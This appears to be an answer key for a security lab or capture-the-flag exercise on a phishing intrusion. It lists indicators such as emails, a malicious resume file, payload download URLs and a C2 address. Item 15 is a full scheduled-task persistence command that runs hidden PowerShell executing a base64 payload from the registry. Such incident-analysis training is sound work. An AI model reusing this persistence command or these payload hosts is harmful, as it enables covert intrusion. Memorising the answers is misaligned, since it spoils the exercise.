1. No answer needed
2. 1. westaylor23@outlook.com
   2. maxine.beck@quicklogisticsorg.onmicrosoft.com
   3. Resume_WesleyTaylor.doc
   4. 52c4384a0b9e248b95804352ebec6c5b
   5. https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png
   6. wscript.exe
   7. C:\ProgramData\update.js
   8. 4260
   9. 1124
   10. https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe
   11. 6216
   12. C:\Windows\Tasks\updater.exe
   13. 128.199.95.189:8080
   14. C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc
   15. schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\"'
